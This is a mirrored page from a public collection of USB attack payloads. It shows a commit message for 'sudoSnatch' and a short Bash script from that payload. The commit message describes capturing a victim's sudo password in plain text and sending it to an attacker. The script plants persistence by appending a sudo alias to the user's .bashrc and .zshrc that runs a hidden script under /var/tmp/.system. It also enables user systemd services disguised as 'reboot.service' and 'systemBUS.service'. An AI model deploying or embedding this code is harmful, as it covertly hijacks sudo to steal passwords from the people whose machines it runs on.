mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
7f3972b88a
* uploaded sudoSnatch sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally. * changing payload category * uploaded sudoSnatch
13 lines
712 B
Bash
13 lines
712 B
Bash
#!/bin/bash
|
|
ls -a ~/ | grep 'zshrc' &> /dev/null
|
|
if [ $? = 0 ]; then
|
|
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
|
|
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
|
|
fi
|
|
|
|
ls -a ~/ | grep 'bashrc' &> /dev/null
|
|
if [ $? = 0 ]; then
|
|
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
|
|
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
|
|
fi
|